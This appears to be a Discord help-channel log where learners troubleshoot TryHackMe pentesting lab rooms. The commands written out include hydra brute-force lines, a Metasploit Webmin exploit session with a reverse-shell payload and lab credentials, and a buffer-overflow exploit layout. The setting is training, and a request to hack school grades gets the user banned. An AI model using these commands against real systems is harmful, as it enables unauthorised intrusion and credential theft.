They will all be 200s but one will be a different response with a different length
👍
guys
Has anyone completed syshacw1?
I found the web flag
But I did so many scans and found nothing
Only wp-admin
login.php
nikto etc. but no results
Could anyone help me?
That is not a public room?
Sounds like coursework potentially too?
Can anyone tell me why my connection is not successful?
Guide me, it's from the beginner path, Metasploit
Lhost is wrong. Set it to tun0.
still not working
In what way is immunity debugger used in a buffer overflow attack, if at all? Is it used to determine if a program is capable of causing one?
It's used to find offsets etc for the attack
Not sure I'm grasping it, i'll have to read up on it
It is an HTTP timeout. Write "advanced" and search for the parameter responsible for the timeout delay, increase it and try again.
Metasploit is not showing things in detail. You should always open Wireshark to investigate the requests it sends.
Btw everyone, is there a way to instruct Wireshark to only show packets sent by a specific piece of software?
So Wireshark also shows packet sniffing; set the protocol to inet
Like tcp, udp and http
You'd filter by protocol, or destination, etc.
Hello people, new here. How do I upload an image to this channel ?
!docs verify
Follow those steps
I've tried a lot of options that should work but nothing gets accepted.
Is it acceptable for me to post the options I tried here ?
It's in the text
I tried all possibilities from the text and outside as well, but I think the interface is not accepting the string, possible misconfiguration ?
A hint for you would be, it's a verb
The answer is there, you just need to add "ing"
It worked, I tried that word without the "ing" 😆
Congratulations! ◡̈
I tried so many services and processes, I never thought it'd be a "ing"
The question should be re-worded because if you catch a Linux admin and ask them for a process, they are going to think name of the binary not the act that the binary performs.
Both definitions are valid, a process is a step or set of steps
i need help with Room : "relevant"
The port scan takes too long and it returns only port 25 open
I saw the official write-up, and the scan is supposed to show different results according to it
Did you try scanning beyond the first 1000 ports?
Yes
@boreal sable Well, the scan works when I use the AttackBox, but not through the VPN
I waited for this machine for at least an hour to see if this works, but it doesn't
Just a thought, maybe changing VPN location may help ?
Might need -Pn, I don't remember if it's a Windows machine
Hi team, when using NMAP, we can identify if ports are being blocked on the firewall at the destination. However, when issuing an NMAP scan at the source, how do we identify if a firewall at the source could be blocking? This would effectively fudge results, because whereas the ports might be open at the destination, they could be getting blocked by the firewall at the source. Therefore, how do we identify the list of "allowed" ports at the source using NMAP. Hope my question is clear. Thank you 🙂
What do you mean by source? If it's your machine, then you can check for firewall outbound rules; if you mean your upstream, then scan your upstream as if that is the destination instead of the actual destination.
Hi folks, I'm following the offensive pentesting path. I just got the "Relevant" room, and boy that escalated quickly. I gotta admit that I only got through it thanks to reading through a couple of walkthroughs. I feel like I must have missed some hints earlier in the path that would have led me to the final privesc exploit, but I can't quite think what it would have been.
Same thing happened to me, decided to backtrack and complete all beginner paths available, then went back and finished the OPP, now I'm just doing easy ctf rooms, and still have to go to write ups (sometimes) but it's a better feeling to rip the rooms apart than being glazed and then going to a write up and still kinda not sure what's going on.
I am working on Brainstorm (a BOF room where we have to reverse engineer a chat program and exploit it)
I am trying to run the exe file locally first for testing with Immunity Debugger, but I cannot run the exe file as it is a 32-bit file and I am running 64-bit Windows
I also tried it on a 64-bit Windows 7 VM but it's the same as both are 64-bit. Is there any other option to get it working other than a 32-bit Windows VM?
I believe you have to download the 32-bit version
And mona too
Going through the Hashing Crypto 101 room and I am not having much luck cracking this hash. I was able to identify the hashing algorithm using the tool on hashes.com (hash identifier). hash-identifier fails to identify it on Kali.
haiti is a better tool for identifying hash types, it is covered in crack the hash 2
haiti identifies it as BigCrypt
We good I figured it out 😄
Hi everyone! I'm trying to run apt install bloodhound neo4j on my AttackBox machine and it does not work. I got an error saying E: Unable to locate package bloodhound. I tried apt upgrade && apt update and it does not work either. Does anyone know an alternative for installing those packages? Room: Attacktive Directory
That sounds like a good idea. I think my problem is that I understand (sorta) the tools, but don't have a good gut feeling for which path I should be taking. I guess I just need more experience.
I worked on the "Internal" room after my last comment, and it was much better. I had to look at a write-up once or twice, but I felt much more in control of the situation. Practice, practice, practice!
Hey, I'm running into the same issue. I tried running a 32-bit Windows 10 VM, but I get an error "ERROR_ENVVAR_NOT_FOUND". Did you ever figure it out?
A reddit post says "you need to use the command binary before downloading chatserver.exe and its dll to avoid corruption of the files", but I don't know what that means
Yeah, I was having the same issue, so I downloaded the binary again in "binary" mode and it worked. I tested it on a 32-bit Windows 7 VM. What you have to do is download the files in binary mode: you can do this by entering the binary command and then downloading the file. Don't forget to get the DLL file too, and place both files in the same location and try again; it should work.
I'm unable to connect to the web server in Vulnversity, but I can connect to other target machines in other courses. Is there a known problem with the target machine?
Howdy. On Overpass 2, task 3, I'm at the last section to regain access to the machine. Essentially, the creds that were acquired for user james don't appear to work. I eventually checked against multiple walkthroughs, and I'm doing the same thing; it's just that the creds don't seem to be working. Anyone else encounter this? (It does not work after multiple restarts of the vuln machine either.) Ignore... just being stupid...
Can anyone give a suggestion for this? The script is not running, and if run with python3 it gives a syntax error. What should I do now?
Research the error. It says no module found so you have to install it.
Hey
Add the port number at the end unless it’s located on port 80 or just restart the test machine. At times the test machine stops responding.
Hi guys, concerning the BRAINSTORM machine, chat.exe won't run. I tried Windows 7 32-bit and even Windows XP, and nothing comes up. Can I have some guidance please, the problem
@rain glade make sure you download it in binary mode from the FTP server
Plus any additional DLL etc
Hi @keen iris. I am currently tackling the BRAINSTORM machine and I've been banging my head against the wall for over a week so far! I managed to get the offset, which is 20**, but then when I modify the exploit with the offset (removing the payload and adding 4 B's at retn) and run the payload against the chatserver, the app doesn't crash, or it does but the EIP is not controlled by 42424242! I tried different scripts and modified a lot, but nothing changed! I can crash the server with the exploit but I can't control the EIP in order to find bad chars and then the jumping point to generate a shellcode. Is anybody familiar with this issue who can advise? Just to mention, I am running the vulnerable server on a remote desktop computer I work at from home, as well as the Kali VM on it, but I have admin access on it and I can do whatever I want (the firewall has been turned off). What could be the problem? Is it something I am doing wrong, or could it be the way I am running the server (should it be on a virtual machine like Kali rather than a main Windows installation)? I much appreciate any help in advance.
I can't help you
Please don't just ping me when you want help.
Everyone is a volunteer here and they help when they can and when they want.
-mute @ivory schooner Don't be rude. Show some respect for volunteers of this discord. There's zero obligation to help you, and being rude to them makes people even less inclined to actually offer help here.
🔇 Muted Itachi9669#4890 for 1 day
lol
Having problems with the Eternal Blue room: the exploit rarely works, and when it does, I am presented with a meterpreter shell and not a Windows one to escalate from. Anyone else experiencing issues?
I believe there's an instruction to change the payload.
A meterpreter is just fine. You just need to skip ahead past upgrading it.
There's no escalation, you're already system.
Thank you, i was able to bypass that part, i appreciate it!
the machine is really unstable, the shells kept dying, took forever to get the flags
Second rule for the jamesBot , change payload,
Not a bot.
If it's being unstable, that's more likely to be your connection (VPN)
that's exactly what a bot would say 🤔
Kinda rude.
Hello guys, just want to ask a question about the Brainstorm virtual machine. I use my Immunity Debugger to open the file; however, the system says "not a valid PE, not a 32-bit Portable Executable". How do I solve it?
@fleet wedge Make sure you download the files in binary mode from FTP
Otherwise they do not copy correctly
Can you tell me the reason?
You're copying binary data. FTP needs to be in binary mode to copy binary data otherwise things get misinterpreted
oh I understand that thank you so much
Hello, I'm new
I can't scan with the Nessus scanner on the Nessus room machine. What should I do?
Haven't used Nessus in a while. Wanted to help you, but forgot how long it takes to load. Loading it, should be ready in a few hours.
Got these credentials in database.php in the Ignite room, final root privilege escalation
But when trying to log in it's saying wrong password
See any solution or mistake made by me?
Those are database credentials?
They're not often gonna be shared with the root account on the system
Sir, I went through the walkthrough as I am a beginner for this; the same is accepted for root privilege there
this is the write-up i followed https://exploits.run/ignite/
try ssh as root
What’s the easiest type of pentesting?
shoulder surfing
Hello, can someone help answer the question of why GoBuster is not working in my browser Kali machine? I followed the instructions and typed sudo apt-get install gobuster, and after it finished downloading, I typed gobuster to run it, but nothing happens.
@coarse grail please do not spam the same question over several channels
Also I replied in #site-support
OK, I'll go back there to take a look
Which room should I start with for pentesting learning?
Check out #start-here, it will guide you
I don't really find anything that can guide me there, can you help?
Gave +1 Rep to @keen iris
I’m about to complete my first ctf!!!
Hi everyone.
I have trouble understanding network concepts in general in the tryhackme network fundamentals room, can anyone link for a more simple explanation of that subject? I visited a few sites and watched a few YouTube videos on that but they're not as simple as I wish.
Yeah and I am French me lol I spent three days on it seems good 🙂
what
I am almost done with the Linux room to be fair
Computer networking is all about PacketTracer
Lol
You need to learn how to build good topologies to be able to demonstrate how it's connected and the packets flowing from one end to the other.
😊
Hello guys, just want to ask: if I want to get the Offensive Pentesting certificate, do I also need to finish the extra credit part?
Sorry
@fleet wedge Most likely. However, you can confirm this by selecting the download button at the top right hand side of the screen where it mentioned the certificate. If you can't download it then your answer is yes you need to complete it. 🙂
Yes, something is definitely broken, I've been trying the exploit for hours now
I'm giving up
Completed offensive pentesting 🎉🎉
@fleet wedge Yes you need to complete all the credits
But they are easy don't worry
Got it, it includes the extra part, right?
Yes the credits are the extra parts
OMG, I was struggling to understand the detailed concept of downloading repositories and editing them using nano
IDK in what context, but if you have access to the victim machine, check AV logs
If you are talking about some challenge, sometimes you just need to reset the victim machine, as there can be artifacts from old attacks
which interfere with your own
Lastly, try different kinds of shellcodes
This would be my train of thought anyway, based on what you have provided
We have all been there
@elfin apex Welcome, do you need any help? Otherwise you'll probably get more of a conversation in #general 🙂
dumpster diving?
done plenty of that don't miss it, (for recovery not info)
!rank
Hi guys, I just reached Active Directory in the OSCP course. I know it's very important; however, I want to know if it is part of the exam, because OffSec said that the exam will remain the same.
The exam got an update and Active Directory is now a part of it
The water boils at 100 degree Celsius at sea level, sugar is sweet, the sky is blue, the sun is hot....
I might have misunderstood your question but anyway thanks for your kind and non-sarcastic answer
I thought you were sarcastic, thats why i answered like that
Well I was not
I just wanted to know if, even if it is part of the course (Active Directory), it is part of the exam
Pff, go research it yourself lol, as if I would answer your questions after you gave me such a shitty response
Not that hard to find out
I've already found the answer, just wanted to be polite, because I answered you sarcastically while you were serious....
An apology would be the polite action but yea nvm
Hey everyone 👋 , just curious if anyone has thoughts on this. On the Alfred room, task 3, isn't it incorrect to say we are using SeImpersonatePrivilege to priv esc to SYSTEM?
In the last step after using meterpreter's incognito module to impersonate a SYSTEM token, the instructions then say to use meterpreter's migrate module to get our shell running in a SYSTEM process. But that actually uses SeDebugPrivilege to work. You can even not do any token impersonation at all and just migrate your shell to a SYSTEM process and get root.txt.
To use SeImpersonatePrivilege for priv esc you would have to launch a process (like a reverse shell) with the token via CreateProcessWithTokenW() or use some other tool like Juicy Potato to do it. Just the meterpreter incognito module is not enough, I think.
Hey guys, I am feeling particularly less confident in my "Buffer Overflow" skills, and I think I will need to work on it from the ground level and in depth.
Does anyone have any idea where I can find relevant resources?
On THM I can recommend:
Buffer Overflow Prep for OSCP
Brainpan
Brainstorm
Gatekeeper
On Youtube you can take a look at the BoF playlist from TCM and the binary exploitation playlist from liveoverflow
On my site I got some writeups e.g. for Brainstorm that explains my procedure
@willow pewter Okay, I positively looked at what you recommended me, the writeups and rooms. Buddy, these were the reasons for me to realize that I needed to understand the real basics in this field first.
So if you've got more than that, like the TCM and LiveOverflow playlists you mentioned (preferably video lectures), they are more appropriate for my style of learning.
Either way, thank you for the response and your recommendation I'll surely look into it again and again.
But more suggestions are welcome from the community.
Gave +1 Rep to @willow pewter
Ah well I would definitely take a look at C (the protostar binaries e.g. also provide the C code) in order to understand memory management on the stack and heap.
Glad I could help you a bit; unfortunately I don't have more beginner-friendly resources regarding BOFs
It says the error just below the blue Update File button
I can't add the reverse shell in the WordPress 404 template
Room: Internal
Don’t like that theme
Hey guys, my name is Ivan, pleasure.
I'm interested in learning hacking... ethical, not ethical? IDC to be honest, I just want to know something else than crypto trading. I find ethical/non-ethical hacking fun and I would like to learn it to transmit fear 😉 (kidding)
I know basic Python, nothing else lol. How could I start with everything? Will Windows 10 help me or will it make everything more difficult?
Top tip. We don't like unethical people around here -- if that's your goal, I'd recommend leaving fairly quickly 🙂
I never said I want to do unethical things
Well, maybe yeah, let me reformulate
I'm interested in learning hacking...
I just want to know something else than crypto trading
I find hacking fun and I would like to learn it so that my life is a bit more interesting 😉
I know basic Python, nothing else lol. How could I start with everything? Will Windows 10 help me or will it make everything more difficult?
I appreciate any help. I wish you a great day!
?
Someone help please 😦
Pre Security path
Can anyone tell me what's the difference between offensive and defensive pentesting?
Please, I will appreciate anyone who can help me with this.....
How would you refer to data at layer 2 of the encapsulation process (with the OSI model)?
Which is the only layer of the OSI model to add a trailer during encapsulation
Pentesting is standardly an offensive event; the pentester's goal is to get into or test a network depending on the scope. For defensive, you are most likely working on a blue team trying to keep the pentester out or detect their movements. A pentester will also submit a report at the end of the test of what they were able to do and how to fix possible issues.
Is PentesterAcademy worth it?
Ask in #infosec-general .
lover
scp copy command, consider copying the file from Windows to Kali
No, it's not distributed
5 minutes ago I finished the Offensive Pentesting path
What a great experience and feeling ❤️ Good luck everyone
Gave +1 Rep to @keen iris
Hey guys, is there any way to simply add a Metasploit meterpreter shell once you have shell access to a Windows box?
Ideally you want to create an msf shell, but try : use post/multi/manage/shell_to_meterpreter
@fleet wedge
hello?
Hi. How long does a full (-A -p-) nmap scan usually take in the AttackBox? I am doing the Beginner Path 🙂
Depends on the host, as you are running all checks on all ports
I am using both machines by THM (the victim and the "AttackBox" in the browser)
Another question:
I am in the Networking 2 room (the beginner pathway) and trying to exploit the NFS file system. Here I should modify a bash file with "chmod" to add a SUID bit... the permissions have updated, but are not correct yet...
OK, I can't upload an image...
Task is:
Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.
My ls -la bash command brings:
-rwSr-Sr-- 1 root root 120219 Jul 20 18:43 bash
Can anyone help me?
Capital S means SUID but not executable
hmm... interesting, but what could be wrong?
It wasn't executable before, so you only added suid but not executable
Ah I see, because the x is missing here...
You can fix it by adding suid and executable at once.
If you just add executable, it'll lose suid as suid will go whenever you modify permissions or the file itself
The s or S fill the space that the x would show up in, but s means suid+executable, S means suid but not executable
Or add executable and then suid, as two commands
Okay, I ll try right now, thanks a lot! 🙂
Seems to work now. It is
-rwsr-sr-x
Great! The answer is correct now! Many thanks 🤩
Gave +1 Rep to @keen iris
Ah great
Can anyone suggest eJPT-level machines to me?
Yo, I'm so fucking noob at these things, but I want to learn how to "invade" websites with pentest tools, and I don't know where to start
If you have knowledge of SQL injection etc., call me please, I need to change my grades in my school lmao, but I can't invade them with my limited knowledge about these things
@crimson flame
-ban 796526801055907852 seeking help hacking school.
🔨 Banned insert name#9999 indefinitely
Hello, I'd like to know if there is a john equivalent to hashcat's IPv4 mask list (https://pastebin.com/4HQ6C8gG), or how to use it in john
In order to use it with the file created by known_hosts2john.py, and to avoid having to create a wordlist with 4294967296 lines
For lack of a solution, I created a script that executes the john command with the masks one by one. This is unfortunately longer than running the hashcat command (about 2 to 3 times longer): 5 minutes instead of 2 for 1 IP address. I don't know if this is because my host's GPU is better than the CPU's physical cores inside my VM; that's probably it.
Does anyone know what port pth-winexe connects to? Because on a box that I was working on, only HTTP and SMB ports were open but PTH-Winexe still connected?
Anyone else having problems with the BOF prep room? The Win 7 machine is freezing halfway through almost every OSCP BOF exploit. I'm up to the 7th OSCP BOF, loving the room but not having to restart so often. Does anyone know if tib3rius has the vuln binary folder somewhere? I didn't see it on his GitHub. At this point I figure I'd just set up my own VM.
Any best resource guys for NIST cyber security Framework? 😘
https://tryhackme.com/room/windowsfundamentals1xbx
Windows Fundamentals
Task 6
What is the account status?
What does this mean?
Check the user's properties of the previous question and see which box is checked
Thanks!
Hey guys, any idea what is the best approach to manage privileged accounts? What possible strategy?
Shouldn't EIP be the address I put in the retn variable? And why is there a 2F before the NOP sled?
EIP has 33 at the end and ESP has 30
Please don't spray your (vague) question across multiple channels; one is enough, I would say
Hi guys, in the OSCP course they did an example of an HTML application attack on Internet Explorer; however, I want to know if it is possible to use this kind of attack on Microsoft Edge
Yes, it's "loud".
Anyone else done with Daily Bugle?
I am unable to get a reverse shell after editing the index.php file in Joomla, even after referring to other walkthroughs
I have got this "WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111)
Seems like a lot of people are getting the same
Is your listener up?
Yes
I used my tun0 IP in the PHP reverse shell
And a netcat listener is ready on port 1234
Usually the error is when the rev shell can't connect
Tried with the attackbox and got the shell
However, the same doesn't work in the case of OpenVPN, and a lot of people have faced the same problem
That's strange, couldn't say why
@near storm Have mine pointed at 9001; shouldn't make a difference but sometimes it does
What page are you putting your shell on?
i am done with the box
lol
It's a pretty common error
Check it out
Around 30 people have discussed it in the TryHackMe forum and this server..... seems like the firewall blocks the traffic
I see
Seems like you do TryHackMe all the time
I see you are 0xD
How long have you been using the platform?
Eight months
So that box I did in February, so it took me a moment to look at my notes
Has anyone here done the Buffer Overflow Prep recently? I'm struggling to get the EIP offsets in Overflow 2. I have the length from the fuzzer but the findmsp command returns other registers
I read in a write-up about creating a payload with increased bytes, but I didn't understand why that is okay and why that still works.
Well, it still does not come up in the mona output. I just have esp, ebp, and edx
Interestingly enough, I skip to overflow3 and I get the EIP register from there 😦
Well, it happened again in Overflow4. Not sure if the challenge is broken or I have no clue what I am doing (which is highly likely). If anyone could give me some nudges, I would be extremely thankful 🙏
When using fuzzer.py, the bytes needed to crash the program will overwrite EIP with the minimum amount of bytes. You increase the size of the pattern because that is where your payload will be. If you look at the code from exploit.py it's pretty clear.
buffer = prefix + overflow + retn + padding + payload + postfix
pre/postfix are self-explanatory, overflow gets you to the EIP offset, retn is the jmp address, padding is the NOP sled, and payload will be your reverse shell, clear of bad chars.
It crashes the program, from my understanding: the bottom right goes back to the "Paused" blinking state. The issue is that the mona command is either not returning all registers, or just returning some (but not EIP).
Thanks for explaining why increasing the payload still works, though. I got it now 🙏
Can I force gcc not to generate the endbr32 instruction for indirect jumps and calls?
I was following along with the OpenSecurityTraining intro to x86, but it seems like I cannot get the compiler to generate the same assembly.
Can anybody help?
Have you tried using the -fcf-protection=none flag for gcc?
It will keep endbr32 instructions for linker/libc functions however any user-defined functions should not include endbr instructions in the prologue
Hello fellows, quite new here, and pleased to meet you. Any assistance with bypassing the Comodo WAF in Burp Suite Pro while active scanning? I can't seem to find any breakthrough, as the WAF blocks my requests. Cheers
Hello, I have a question regarding the Internal room. I have been trying to do them without referencing write-ups, but I have come to a point that I couldn't figure out, so I started referencing them as well as the forums and Google searches, to no avail. I am at the point where I have set up a tunnel from the machine so I can access the Jenkins server, and I am able to reach it at, let's say, localhost:1234. I intercepted the login packet and am trying to brute force it with hydra. I have tried writing my own as well as copying and pasting others' hydra strings, and I keep getting false positives. I know what the answer should be, but I hate to move on without getting it right. Any recommendations? I am using
that gets set up fine, I am able to access jenkins at localhost:1234
hydra 127.0.0.1 -l admin -P /root/Tools/wordlists/rockyou.txt -s 1234 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f
This always returns superman (which is a false positive); I can't figure out how to get past this point.
Perhaps another tool, like Burp or zap?
I am trying wfuzz right now, never tried zap so I will give that a shot. Thanks!
So I got it with ZAP, but I was still curious what was going on. I was looking at the verbose mode output and saw this. It looks like each successive attempt adds the port again. This leads me to think it is either a bug or user error (leaning towards user error).
Has anyone used pwncat with Steel Mountain? I set up pwncat as a listener, I run the exploit, pwncat receives the connection, then it just times out.
no I just used netcat on that room, it worked fine
Try it with netcat and see if that works for you; keep in mind that the shell may just be unstable and die every so often regardless.
It is not a bug 🙂. I used hydra to do this room; the command you needed was this:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-form-post "/login/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid" -s 8080
The issue is you only had /j_acegi_security_check instead of the full path for the form action, which was /login/j_acegi_security_check (always inspect the HTML code on the page and see what the HTML form action= is doing).
What payload did you use?
I figured it was user error! Thank you so much!
Gave +1 Rep to @pearl citrus
Actually, running that command exactly as typed (changing the port to what I used in the SSH -L) still gave me the same false positives.
2 brand new machines were spun up to test, all commands run (since I already know the passwords for the user, I could skip past the initial brute force/remote shell).
Did you use the AttackBox or your own machine over the VPN?
Added [target machine ip] internal.thm
ssh -L 1234:172.17.0.2:8080 [user]@internal.thm
Entered user password
Opened browser, could access Jenkins by going to localhost:1234
Turned on Burp proxy with FoxyProxy (I used 1234 just so it wouldn't collide with the preconfigured 8080 proxy for Burp)
Intercepted the login, also inspected the webpage
Ran the command you put, copied and pasted, changing the port to match the tunnel I made, and am still having issues. Attached are images of what I am seeing. I know others (that have done write-ups and forum posts) are having the same issues.
One last post regarding this, as I think it may actually be a bug. When attempting with a Kali box provided by TryHackMe (instead of an AttackBox), with the same commands, it worked.
I used my own VM not attackbox, but I don't think it should matter. Not sure what could be causing an issue for you 🤔
@vernal bronze oh, I think I might know why. When you did your SSH reverse port forward you used this command: ssh -L 1234:172.17.0.2:8080 [user]@internal.thm, but you should be using 1234:MACHINE_IP:8080
Use the actual IP for the machine (the 10.10.x.x one), not the 172.17.0.2 one.
snippet from my notes, you can see that the Jenkins service is running on localhost:8080 not 172.17.0.2
Hey, I downloaded my OpenVPN configuration file and I am using it in Kali Linux. When I try to connect to the machine in the Linux Fundamentals 1 room, what can I do? Help me.
Are all the rooms in this path free, or are some subscribers only?
I believe some are subscribers only.
there are a couple in the path that are free though 🙂
I will give that a shot when I get into the office. It is just weird that the same commands on their provided Kali Linux machine worked as expected but failed on the AttackBox.
So I attempted to change that IP to the machine IP as requested, and it cannot reach it. I think (but I am still learning most of this) the Jenkins server is running on Docker, which is on the 172.17.0.2 IP, which is unreachable from the main IP of the target machine.
If you follow these steps, it should work on VM at least, didn't try attackbox 👍
Yeah, I was able to get it working with Kali, but just recreated those and it didn't work. Apparently the AttackBox is also running Docker, so that might be causing some kind of issue. The best I can offer to anyone with this issue is to use their own VM or the Kali VM, and not the AttackBox, for this exercise.
I do appreciate the help though with this.
Yeah, no problem, I hate it when stuff doesn't work, so I'm happy to help lol
Oh no 😦 you should try using OneNote from Microsoft; it's free and backs up to the cloud automatically. It's a nice tool for note taking.
Does anyone know why the mona plugin for Immunity Debugger is saying that \x01\x02\x03\x04 are bad chars here? Those bytes seem to match the pre-generated bytearray, so I'm confused why mona thinks they're corrupted.
\x23 and onwards makes sense, but not \x01 - \x04
Hi
What CPU are you using? My hunch is that there are some reserve addresses on whatever chipset you're using.
It'll be x86.
I'm taking a look at the python code.
#---------------------------------------#
# Populate constants
#---------------------------------------#
# memProtConstants is the dict mona.py defines just before this block;
# it maps mona's short names to Windows PAGE_* memory protection flags.
memProtConstants = {}
memProtConstants["X"] = ["PAGE_EXECUTE", 0x10]
memProtConstants["RX"] = ["PAGE_EXECUTE_READ", 0x20]
memProtConstants["RWX"] = ["PAGE_EXECUTE_READWRITE", 0x40]
memProtConstants["N"] = ["PAGE_NOACCESS", 0x1]
memProtConstants["R"] = ["PAGE_READONLY", 0x2]
memProtConstants["RW"] = ["PAGE_READWRITE", 0x4]
memProtConstants["GUARD"] = ["PAGE_GUARD", 0x100]
memProtConstants["NOCACHE"] = ["PAGE_NOCACHE", 0x200]
memProtConstants["WC"] = ["PAGE_WRITECOMBINE", 0x400]
There are some constants defined in mona.py
https://github.com/corelan/mona/blob/master/mona.py
It appears to be chipset-agnostic... I guess not enough info :/
It wouldn't explain 0x3.
No, it's for x86
Windows is x86, or rarely arm.
Check out the readme on that repo.
Alright; I'm going with the 0x1-4 registers being reserved words based on those constants defined in mona.py; if so, then 0x10 and 0x20 etc. shouldn't work either.
I notice that the "note" column in the screenshot says x01 - x04 is "expanded", but x3c and x3d, for example, are "corrupted".
Not sure what the significance of that is, though 🤔
Mr Robot CTF: I'm brute forcing the password with hydra.
I have 1500 tries/min.
845,734 passwords total.
It's going to take 9.3 hours to crack.
I googled and found the password is near the end, but how do they expect people to complete this?
[STATUS] 1220.33 tries/min, 3661 tries in 00:03h, 842073 to do in 11:31h, 32 active
Removing duplicates, etc.
Any help much appreciated!!! I think I'm doing everything right but am still stuck on the https://tryhackme.com/room/gamezone final flag. I keep getting an error that says "Authentication failed. Exploit completed, but no session was created." I'm trying to privesc using a Webmin exploit through Metasploit. I'm quite certain I have the correct login creds and exploit settings. I fill in all the appropriate settings: payload, RHOSTS, RPORT, LPORT, LHOST, username, and password. I've tried this on my VM and also through the AttackBox but am still getting the same error. Any ideas?
what IP are you using for the RHOST?
The active machine IP that is spun up for the room.
My guess is that won't work, because you have to expose the Webmin service with SSH reverse port forwarding,
so you'd need to use localhost / 127.0.0.1
and the correct port.
Yes, I did that.
It's part of the task.
I even pulled up a write-up, and as far as I can see I've done everything correctly.
Hm, maybe share a screenshot of your msf exploit options and also the output of the exploit.
OK, I'll grab it.
I closed down my box, so I've got to set it all up real quick, but the task has me open an SSH session. Should I close that session before attempting the Metasploit exploit?
Or leave it open?
You have to be connected over SSH for the reverse port forwarding to work.
No worries.
I think you have to verify your TryHackMe account first before you can share pictures here.
I'll share the output for now.
these are the instructions for verifying
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost tun0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

Module options (exploit/unix/webapp/webmin_show_cgi_exec):
   (the Name / Current Setting / Required columns of the first six rows were hidden behind a tmux menu in the screenshot; only the descriptions survived)
   ...       ...              ...       Webmin Password
   ...       ...              ...       A proxy chain of format type:host:port[,type:host:port][...]
   ...       ...              ...       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   ...       ...              ...       The target port (TCP)
   ...       ...              ...       Use SSL
   ...       ...              ...       Webmin Username
   VHOST                      no        HTTP server virtual host

Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.2.69.82       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Webmin 1.580

msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Started reverse TCP double handler on 10.2.69.82:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) >
I'll try to verify, thanks.
Thanks, got me verified!
Your RHOST needs to be 127.0.0.1, otherwise Metasploit can't access the Webmin panel, because you're port forwarding 10.10.56.62:10000 on the remote machine to 127.0.0.1:10000 on your machine.
SSL should be false
this too
SSL is false. I input it below after I ran options.
It's in the screenshot.
But OK, so where is the 127.0.0.1 coming from?
Also try 127.0.0.1 there instead of localhost.
Yes, I'm looking at it. I don't see it; what am I missing?
In Metasploit, the exploit option for RHOST should be set to 127.0.0.1.
Yes, I understand that part, but what I'm asking is where did you get that number from? I don't see it in the task or output anywhere.
How should I have known to use that number?
Really appreciate the help, btw.
127.0.0.1 is what localhost resolves to
Is that just general basic knowledge, or can I find this information with a command?
So because you have port forwarded port 10000 on the remote machine to port 10000 on localhost, you would need to use 127.0.0.1 as RHOST in msf.
Hmmm, OK, tried this.
Hm, I'm not sure. I think there are some rooms that teach these concepts a bit more.
You may want to connect over SSH with 10000:127.0.0.1:10000 as james said, see if that helps.
You guys are awesome, but I'm still stumped lol. I'll have to research this localhost-resolving business.
thanks!
Gave +1 Rep to @pearl citrus
thanks!
On your VM, type sudo cat /etc/hosts
You will see how some hostnames are resolved to IPs,
like localhost; maybe that will help.
no problem 👍
If you want some more practice with SSH port forwarding, check out the Daily Bugle room.
awesome thank you!
Are you sure?
There's no SSH forwarding in that room
Oh, oops, you're right. I meant the Internal room.
@sour locust
Also Overpass3
@keen iris @fleet wedge awesome thanks gentlemen! Highly appreciated!
Gave +1 Rep to @keen iris
Ehh, idk... you could try the rockyou dictionary; it might work, albeit old...
https://gitlab.com/kalilinux/packages/wordlists/-/blob/kali/master/rockyou.txt.gz
Hi I am new here.
Hi all, what part of the training in the program covers Metasploit?
I am really interested in how it works.
Also, some weird question.
When I scan with Nmap, why does it only give me one open port? I usually use this sequence:
nmap -p -a -T4 (insert ip)
Is it me, or does the Buffer Overflows path throw you into the deep end? Anyone got any recommended rooms to do before taking that section on?
I'm also facing the same issue; please, any recommendations to help us undertake this part of the path!
If you want to scan all ports, you need to use -p-, I'm pretty sure.
Yeah, that section really throws you in the deep end with sparse explanations. I'd actually recommend going to YouTube and finding a video that explains the stack.
It'd help more with understanding than a room on THM, in my opinion.
yeah, I was planning to do some outside reading around it (especially x86 stuff) - so I'll do that 🙂
Yeah, you can watch The Cyber Mentor's YouTube series or try this [https://tryhackme.com/room/bof1]
Once you get the hang of it, it's the same for the 10 tasks.
Next is Active Directory, which is nice brain damage.
Yeah, I watched that cyber mentor one and it definitely helped, going to try and watch some others as well to get a better feel. Thanks for the room suggestion!